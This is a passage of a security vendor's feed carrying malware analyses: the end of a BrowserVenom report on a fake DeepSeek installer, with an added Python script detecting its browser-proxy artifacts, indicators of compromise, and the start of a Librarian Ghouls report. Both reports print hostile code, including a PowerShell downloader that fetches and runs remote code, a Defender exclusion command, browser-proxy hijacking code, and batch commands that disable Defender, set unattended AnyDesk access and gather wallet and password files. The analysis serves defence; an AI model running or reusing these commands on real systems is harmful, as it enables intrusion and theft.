<p>The malicious installer <code>AI_Launcher_1.21.exe</code> is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.</p>
<div id="attachment_116768" style="width: 1290px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116768" class="size-full wp-image-116768" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2.png" alt="The second fake CAPTCHA" width="1280" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2.png 1280w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-300x240.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-1024x819.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-768x614.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-500x400.png 500w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-438x350.png 438w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-740x592.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-350x280.png 350w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-800x640.png 800w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></a><p id="caption-attachment-116768" class="wp-caption-text">The second fake CAPTCHA</p></div>
<p>This is another fake CAPTCHA that is loaded from <code>https[:]//casoredkff[.]pro/captcha</code>. After the checkbox is ticked, the URL is appended with <code>/success</code>, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.</p>
<div id="attachment_116769" style="width: 2058px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116769" class="size-full wp-image-116769" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3.png" alt="Two options to install abused LLM frameworks" width="2048" height="924" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-300x135.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-1024x462.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-768x347.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-1536x693.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-776x350.png 776w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-740x334.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-621x280.png 621w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-800x361.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a><p id="caption-attachment-116769" class="wp-caption-text">Two options to install abused LLM frameworks</p></div>
<p>Clicking either of the “Install” buttons does download and execute the respective installer, but with a caveat: another function, <code>MLInstaller.Runner.Run()</code>, runs concurrently. This function triggers the infectious part of the implant.</p><pre class="urvanov-syntax-highlighter-plain-tag">private async void lmBtn_Click(object sender, EventArgs e)
{
try
{
MainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();
this.lmBtn.Text = "Downloading..";
this.lmBtn.Enabled = false;
Action action;
if ((action = MainFrm.<>O.<0>__Run) == null)
{
action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run)); // <--- malware initialization
}
Task.Run(action);
CS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
[...]</pre><p>
When the <code>MLInstaller.Runner.Run()</code> function is executed in a separate thread on the machine, the infection develops in the following three steps:</p>
<ol>
<li>
<p>First, the malicious function tries to exclude the user’s profile folder from Windows Defender scanning. The command that does this is stored as an AES-encrypted buffer, which the function decrypts first.</p>
<p>The AES encryption information is hardcoded in the implant:</p>
<table>
<tbody>
<tr>
<td><strong>Type</strong></td>
<td>AES-256-CBC</td>
</tr>
<tr>
<td><strong>Key</strong></td>
<td>01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20</td>
</tr>
<tr>
<td><strong>IV</strong></td>
<td>01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10</td>
</tr>
</tbody>
</table>
<p>The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.</p><pre class="urvanov-syntax-highlighter-plain-tag">powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE</pre><p>
It should be noted that this command needs administrator privileges and will fail if the user lacks them.</p>
</li>
<li>
After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). As the script shows, on a .NET 2.x runtime the downloaded executable is saved as <code>%USERPROFILE%\Music\1.exe</code> under the user’s profile and then executed; on newer runtimes it is instead loaded into memory via reflection.</p><pre class="urvanov-syntax-highlighter-plain-tag">$ap = "/api/getFile?fn=lai.exe";
$b = $null;
foreach($i in 0..1000000) {
$s = if ($i -gt 0) {
$i
} else {
""
};
$d = "https://app-updater$s.app$ap";
$b = (New-Object Net.WebClient).DownloadData($d);
if ($b) {
break
}
};
if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion() -match "^v2") {
[IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
Start-Process "$env:USERPROFILE\Music\1.exe" -NoNewWindow
} else {
([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
}</pre><p>
At the moment of our research, there was only one domain in existence: <code>app-updater1[.]app</code>. No binary can be downloaded from this domain as of now, but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are listed in the IoCs section.</p>
</li>
<li>
Then the <code>MLInstaller.Runner.Run()</code> function locates a hardcoded second-stage payload stored in the <code>ConfigFiles.load</code> variable of the malicious installer. This executable is decrypted with the same AES algorithm as before, then loaded into memory and run.
</li>
</ol>
<h2 id="loaded-implant-browservenom">Loaded implant: BrowserVenom</h2>
<p>We dubbed the next-stage implant <strong>BrowserVenom</strong> because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim’s browsing activity while decrypting their traffic.</p>
<p>First, BrowserVenom checks if the current user has administrator rights – exiting if not – and installs a hardcoded certificate created by the threat actor:</p><pre class="urvanov-syntax-highlighter-plain-tag">[...]
X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
if (RightsChecker.IsProcessRunningAsAdministrator())
{
StoreLocation storeLocation = StoreLocation.LocalMachine;
X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
x509Store.Open(OpenFlags.ReadWrite);
x509Store.Add(x509Certificate);
[...]</pre><p>
Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based browsers (e.g., Chrome or Microsoft Edge), it appends the <code>--proxy-server</code> argument to all existing LNK shortcut files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user’s profile preferences:</p><pre class="urvanov-syntax-highlighter-plain-tag">[...]
new ChromeModifier(new string[]
{
"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
"blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
}, string.Concat(new string[]
{
"--proxy-server=\"",
ProfileSettings.Host,
":",
ProfileSettings.Port,
"\""
})).ProcessShortcuts();
GeckoModifier.Modify();
[...]</pre><p>
The settings currently utilized by the malware are as follows:</p><pre class="urvanov-syntax-highlighter-plain-tag">public static readonly string Host = "141.105.130[.]106";
public static readonly string Port = "37121";
public static readonly string ID = "LauncherLM";
public static string HWID = ChromeModifier.RandomString(5);</pre><p>
The variables <code>Host</code> and <code>Port</code> are the ones used as the proxy settings, and the <code>ID</code> and <code>HWID</code> are appended to the browser’s User-Agent, possibly as a way to keep track of the victim’s network traffic.</p>
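<p>The two persistence points just described, the <code>--proxy-server</code> argument written into browser shortcuts and the proxy pinned in Gecko profile preferences, are the artifacts a responder can look for, together with the tag appended to the User-Agent and the <code>app-updater</code> domain pattern from the downloader step. The following Python is an added example, not code from this write-up or from the malware: it scans shortcut bytes for the argument (a byte-level scan rather than a full LNK parse), reads the standard <code>network.proxy.*</code> keys from a prefs file (the write-up does not list which keys the implant sets, so those are assumed), and checks proxy log lines and domain names. The proxy host, port and tag come from the write-up; all sample inputs are constructed.</p>

```python
"""Host and log checks for the BrowserVenom artifacts described above.

Added example, not code from the Securelist write-up or the implant.
Proxy host, port and the User-Agent tag are the values the write-up gives;
every sample input below is constructed.
"""
import re
from typing import Iterable, Optional

KNOWN_PROXY = "141.105.130.106:37121"   # ProfileSettings.Host:Port from the write-up
UA_TAG_RE = re.compile(r"\bLauncherLM\b")  # ProfileSettings.ID, appended to the User-Agent

# A shortcut argument string carrying a proxy endpoint, quoted or unquoted.
PROXY_ARG_RE = re.compile(r'--proxy-server="?([^\s"\x00]+)')
# user_pref("network.proxy.<key>", "string" | number);  (Gecko prefs.js / user.js syntax)
GECKO_PREF_RE = re.compile(r'user_pref\("(network\.proxy\.[a-z_]+)",\s*(?:"([^"]*)"|(\d+))\);')
# Stage two domains named in the write-up: app-updater.app, app-updater1.app, ...
STAGE2_DOMAIN_RE = re.compile(r"^app-updater\d*\.app$", re.I)


def _text_views(data: bytes) -> Iterable[str]:
    """Decode raw shortcut bytes as UTF-16LE (both alignments) and as 8-bit text.

    Shortcut string data is normally UTF-16LE. This is a byte-level scan, not a
    full .lnk parser, so it finds the argument wherever it sits in the file.
    """
    yield data.decode("utf-16-le", errors="ignore")
    yield data[1:].decode("utf-16-le", errors="ignore")
    yield data.decode("latin-1")


def shortcut_proxy_args(data: bytes) -> list:
    """Return every --proxy-server value embedded in a shortcut file's bytes."""
    found = []
    for view in _text_views(data):
        for match in PROXY_ARG_RE.finditer(view):
            if match.group(1) not in found:
                found.append(match.group(1))
    return found


def gecko_forced_proxy(prefs_text: str) -> Optional[str]:
    """Return host:port if a Gecko prefs file pins a manual HTTP proxy.

    Assumption: the implant uses the standard network.proxy.* keys; the
    write-up only says the profile preferences are modified.
    """
    prefs = {}
    for match in GECKO_PREF_RE.finditer(prefs_text):
        prefs[match.group(1)] = match.group(2) if match.group(2) is not None else match.group(3)
    if prefs.get("network.proxy.type") != "1":   # 1 = manual proxy configuration
        return None
    host, port = prefs.get("network.proxy.http"), prefs.get("network.proxy.http_port")
    return f"{host}:{port}" if host and port else None


def tagged_user_agents(log_lines: Iterable[str]) -> list:
    """Return web proxy log lines whose User-Agent carries the LauncherLM tag."""
    return [line for line in log_lines if UA_TAG_RE.search(line)]


def is_stage2_domain(name: str) -> bool:
    """True for names matching the app-updater<N>.app pattern."""
    return STAGE2_DOMAIN_RE.match(name.strip().rstrip(".")) is not None


# --- constructed samples (not real artifacts) --------------------------------
_CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
SAMPLE_LNK_MODIFIED = b"L\x00\x00\x00" + b"\x00" * 20 + (
    f'{_CHROME} --proxy-server="{KNOWN_PROXY}"').encode("utf-16-le")
SAMPLE_LNK_CLEAN = b"L\x00\x00\x00" + b"\x00" * 20 + _CHROME.encode("utf-16-le")
SAMPLE_PREFS = """\
user_pref("browser.startup.page", 1);
user_pref("network.proxy.type", 1);
user_pref("network.proxy.http", "141.105.130.106");
user_pref("network.proxy.http_port", 37121);
"""
SAMPLE_PROXY_LOG = [
    '10.0.0.5 GET https://example.com/ 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0 Safari/537.36"',
    '10.0.0.7 GET https://example.com/ 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0 Safari/537.36 LauncherLM aB3xZ"',
]


def scan(lnk_files: dict, prefs_text: str, log_lines: list) -> dict:
    """Collect findings from shortcut bytes, one prefs file and proxy log lines."""
    shortcuts = {name: shortcut_proxy_args(blob) for name, blob in lnk_files.items()}
    findings = {
        "shortcuts": {name: args for name, args in shortcuts.items() if args},
        "gecko_proxy": gecko_forced_proxy(prefs_text),
        "tagged_requests": tagged_user_agents(log_lines),
    }
    seen = [findings["gecko_proxy"]] + sum(findings["shortcuts"].values(), [])
    findings["known_proxy_seen"] = KNOWN_PROXY in seen
    return findings


if __name__ == "__main__":
    result = scan({"chrome.lnk": SAMPLE_LNK_MODIFIED, "edge.lnk": SAMPLE_LNK_CLEAN},
                  SAMPLE_PREFS, SAMPLE_PROXY_LOG)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("stage two domain:", is_stage2_domain("app-updater1.app"))
```

<p>On a real host the shortcut check would be run over every <code>.lnk</code> under the user’s Desktop, Start Menu and taskbar directories, and the prefs check over each profile’s <code>prefs.js</code> and <code>user.js</code>; any proxy endpoint found is worth attention, not only the one listed here, since the settings are easily changed between builds.</p>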
<h2 id="conclusion">Conclusion</h2>
<p>As <a href="https://securelist.com/tag/deepseek/" target="_blank" rel="noopener">we have been reporting</a>, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors’ use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.</p>
<p>At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.</p>
<p>To protect against these attacks, users are advised to check that the sites appearing in their search results are the official ones, verifying their URLs and certificates, so that the software is downloaded from its legitimate source. Taking these precautions can help avoid this type of infection.</p>
<p>Kaspersky products detect this threat as <code>HEUR:Trojan.Win32.Generic</code> and <code>Trojan.Win32.SelfDel.iwcv</code>.</p>
<h2 id="indicators-of-compromise">Indicators of Compromise</h2>
<h3 id="hashes">Hashes</h3>
<p><a href="https://opentip.kaspersky.com/d435a9a303a27c98d4e7afa157ab47de/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______235b5c745a7b1f1d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">d435a9a303a27c98d4e7afa157ab47de</a> AI_Launcher_1.21.exe<br />
<a href="https://opentip.kaspersky.com/dc08e0a005d64cc9e5b2fdd201f97fd6/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______a1bb6d16148b88eb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dc08e0a005d64cc9e5b2fdd201f97fd6</a></p>
<h3 id="domains-and-ips">Domains and IPs</h3>
<table>
<tbody>
<tr>
<td><a href="https://opentip.kaspersky.com/deepseek-platform.com/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______eed927492d26acd3&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">deepseek-platform[.]com</a></td>
<td>Main phishing site</td>
</tr>
<tr>
<td><a href="https://opentip.kaspersky.com/r1deepseek-ai.com/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______2150c37d57701b12&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">r1deepseek-ai[.]com</a></td>
<td>Distribution server</td>
</tr>
<tr>
<td><a href="https://opentip.kaspersky.com/app-updater1.app/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______d6653806f231fd05&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">app-updater1[.]app</a></td>
<td rowspan="3">Stage #2 servers</td>
</tr>
<tr>
<td><a href="https://opentip.kaspersky.com/app-updater2.app/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______603b0cc1992e91cb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">app-updater2[.]app</a></td>
</tr>
<tr>
<td><a href="https://opentip.kaspersky.com/app-updater.app/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______262fdc00828be6d6&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">app-updater[.]app</a></td>
</tr>
<tr>
<td><a href="https://opentip.kaspersky.com/141.105.130.106/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______6597cebfec71a013&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">141.105.130[.]106</a></td>
<td>Malicious proxy</td>
</tr>
</tbody>
</table>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>Sleep with one eye open: how Librarian Ghouls steal data by night</title>
<link>https://securelist.com/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto/116536/</link>
<comments>https://securelist.com/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto/116536/#respond</comments>
<dc:creator><![CDATA[Kaspersky]]></dc:creator>
<pubDate>Mon, 09 Jun 2025 10:00:09 +0000</pubDate>
<category><![CDATA[APT reports]]></category>
<category><![CDATA[Malware Technologies]]></category>
<category><![CDATA[Targeted attacks]]></category>
<category><![CDATA[Malware Descriptions]]></category>
<category><![CDATA[Spear phishing]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[APT]]></category>
<category><![CDATA[PowerShell]]></category>
<category><![CDATA[Miner]]></category>
<category><![CDATA[XMRig]]></category>
<category><![CDATA[WinRAR]]></category>
<category><![CDATA[Microsoft Edge]]></category>
<category><![CDATA[APT (Targeted attacks)]]></category>
<category><![CDATA[Windows malware]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116536</guid>
<description><![CDATA[According to Kaspersky, Librarian Ghouls APT continues its series of attacks on Russian entities. A detailed analysis of a malicious campaign utilizing RAR archives and BAT scripts.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
<p>Librarian Ghouls, also known as “Rare Werewolf” and “Rezet”, is an APT group that targets entities in Russia and the CIS. Other security vendors are also monitoring this APT and releasing analyses of its campaigns. The group has remained active through May 2025, consistently targeting Russian companies.</p>
<p>A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries. The malicious functionality of the campaign described in this article is implemented through command files and PowerShell scripts. The attackers establish remote access to the victim’s device, steal credentials, and deploy an XMRig crypto miner in the system.</p>
<p>Our research has uncovered new tools within this APT group’s arsenal, which we will elaborate on in this article.</p>
<h2 id="technical-details">Technical details</h2>
<h3 id="initial-infection-vector">Initial infection vector</h3>
<p>Attacks by Librarian Ghouls continued almost unabated throughout 2024. We observed a slight decline in the group’s activity in December, followed immediately by a new wave of attacks, which is ongoing. The group’s primary initial infection vector involves targeted phishing emails that contain password-protected archives with executable files inside. These malicious emails are typically disguised as messages from legitimate organizations, containing attachments that appear to be official documents. The infection process is as follows: the victim opens the attached archive (the password is usually provided in the email body), extracts the files inside, and opens them.</p>
<p>We managed to get hold of a malicious implant from an archive disguised as a payment order. The sample is a self-extracting installer made with the Smart Install Maker utility for Windows.</p>
<p>The installer contains three files: an archive, a configuration file, and an empty file irrelevant to our analysis. They are later renamed into <code>data.cab</code>, <code>installer.config</code> and <code>runtime.cab</code> respectively.</p>
<p>The primary malicious logic resides in the installer’s configuration file. It uses a variety of registry modification commands to automatically deploy the legitimate window manager, 4t Tray Minimizer, onto the system. This software can minimize running applications to the system tray, allowing attackers to obscure their presence on the compromised system.</p>
<p>Once 4t Tray Minimizer is installed, the installer pulls three files from <code>data.cab</code> and puts them into the <code>C:\Intel</code> directory, specifically at:</p>
<table>
<tbody>
<tr>
<td><strong>File</strong></td>
<td><strong>Name when archived</strong></td>
<td><strong>Path on the infected system</strong></td>
</tr>
<tr>
<td>Legitimate PDF as a decoy</td>
<td>0</td>
<td>\Intel\Payment Order # 131.pdf</td>
</tr>
<tr>
<td>Legitimate curl utility executable</td>
<td>1</td>
<td>\Intel\curl.exe</td>
</tr>
<tr>
<td>LNK file</td>
<td>2</td>
<td>\Intel\AnyDesk\bat.lnk</td>
</tr>
</tbody>
</table>
<p>The PDF decoy resembles an order to pay a minor amount:</p>
<div id="attachment_116537" style="width: 711px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116537" class="size-full wp-image-116537" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1.png" alt="PDF document imitating a payment order" width="701" height="863" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1.png 701w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1-244x300.png 244w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1-284x350.png 284w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1-227x280.png 227w" sizes="auto, (max-width: 701px) 100vw, 701px" /></a><p id="caption-attachment-116537" class="wp-caption-text">PDF document imitating a payment order</p></div>
<h3 id="rezet-cmd">rezet.cmd</h3>
<p>Once <code>data.cab</code> is unpacked, the installer generates and executes a <code>rezet.cmd</code> command file, which then reaches out to the C2 server <code>downdown[.]ru</code>, hosting six files with the JPG extension. <code>rezet.cmd</code> downloads these to <code>C:\Intel</code>, changing their file extensions to: <code>driver.exe</code>, <code>blat.exe</code>, <code>svchost.exe</code>, <code>Trays.rar</code>, <code>wol.ps1</code>, and <code>dc.exe</code>.</p>
<ul>
<li><code>driver.exe</code> is a customized build of <code>rar.exe</code>, the console version of WinRAR 3.80. This version has had user dialog strings removed: it can execute commands but provides no meaningful output to the console.</li>
<li><code>blat.exe</code> is <a href="http://www.blat.net" target="_blank" rel="noopener">Blat</a>, a legitimate utility for sending email messages and files via SMTP. Attackers use this to send data they steal to an email server they control.</li>
<li><code>svchost.exe</code> is the remote access application AnyDesk. Attackers use this to remotely control the compromised machine.</li>
<li><code>dc.exe</code> is Defender Control, which allows disabling Windows Defender.</li>
</ul>
<p>After downloading the files, the script uses the specified password and the <code>driver.exe</code> console utility to extract <code>Trays.rar</code> into the same <code>C:\Intel</code> directory and run the unpacked <code>Trays.lnk</code>. This shortcut allows starting 4t Tray Minimizer minimized to the tray.</p>
<p>Next, the script installs AnyDesk on the compromised device and downloads a <code>bat.bat</code> file from the C2 server to <code>C:\Intel\AnyDesk</code>. Finally, <code>rezet.cmd</code> runs <code>bat.lnk</code>, which was previously extracted from <code>data.cab</code>.</p>
<h3 id="bat-bat">bat.bat</h3>
<p>Opening the <code>bat.lnk</code> shortcut runs the <code>bat.bat</code> batch file, which executes a series of malicious actions.</p>
<h4 id="disabling-security-measures-and-a-scheduled-task">Disabling security measures and a scheduled task</h4>
<p>First, the BAT file sets the password <code>QWERTY1234566</code> for AnyDesk, which allows the attackers to connect to the victim’s device without asking for confirmation.</p>
<p>Next, the script uses the previously downloaded Defender Control (<code>dc.exe</code>) application to disable Windows Defender.</p>
<p>To keep the victim’s computer on and available for remote connections, the batch file runs the <code>powercfg</code> utility six times with different parameters. This utility controls the local machine’s power settings.</p>
<p>Next, <code>bat.bat</code> runs the <code>schtasks</code> utility to create a <code>ShutdownAt5AM</code> scheduler task, which shuts down the victim’s PC every day at 5 AM as the name suggests. It is our assessment that the attackers use this technique to cover their tracks so that the user remains unaware that their device has been hijacked.</p><pre class="urvanov-syntax-highlighter-plain-tag">echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access
%SYSTEMDRIVE%\Intel\dc.exe /D
powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
powercfg -change -standby-timeout-ac 0
powercfg -change -hibernate-timeout-ac 0
powercfg -h off
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00</pre>
<p align="center"><strong><em>Disabling security measures and the power management configuration in bat.bat</em></strong></p>
<h4 id="wakeup-script-and-data-theft">Wakeup script and data theft</h4>
<p>Next, the batch file executes the <code>wol.ps1</code> script via PowerShell.</p><pre class="urvanov-syntax-highlighter-plain-tag">$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
# Creating task settings
$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
# Registering task in Task Scheduler
Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force</pre>
<p align="center"><strong><em>Contents of the “wol.ps1” script</em></strong></p>
<p>This script launches Microsoft Edge every day at 1 AM. We found no evidence of <code>msedge.exe</code> being replaced or compromised, leading us to believe it is a genuine Microsoft Edge executable. This daily browser activation wakes the victim’s computer, giving attackers a four-hour window to establish unauthorized remote access with AnyDesk before the scheduled task shuts the machine down at 5 AM.</p>
<p>Following the execution of the PowerShell script, <code>bat.bat</code> removes the curl utility, the <code>Trays.rar</code> archive, and the AnyDesk installer. The attackers no longer need these components: at this stage of the infection, all necessary malicious files and third-party utilities have been downloaded with curl, <code>Trays.rar</code> has been unpacked, and AnyDesk has been installed on the device.</p>
<p>After that, the batch file sets environment variables for Blat. These variables contain, among other things, the email addresses where the victim’s data will be sent and the passwords for these accounts.</p>
<p>The next step is to collect information stored on the device that is of interest to the attackers:</p>
<ul>
<li>Cryptocurrency wallet credentials and seed phrases</li>
<li>Dumps of the <code>HKLM\SAM</code> and <code>HKLM\SYSTEM</code> registry keys made with <code>reg.exe</code></li>
</ul>
<pre class="urvanov-syntax-highlighter-plain-tag">%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\wallet.dat /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.txt /y
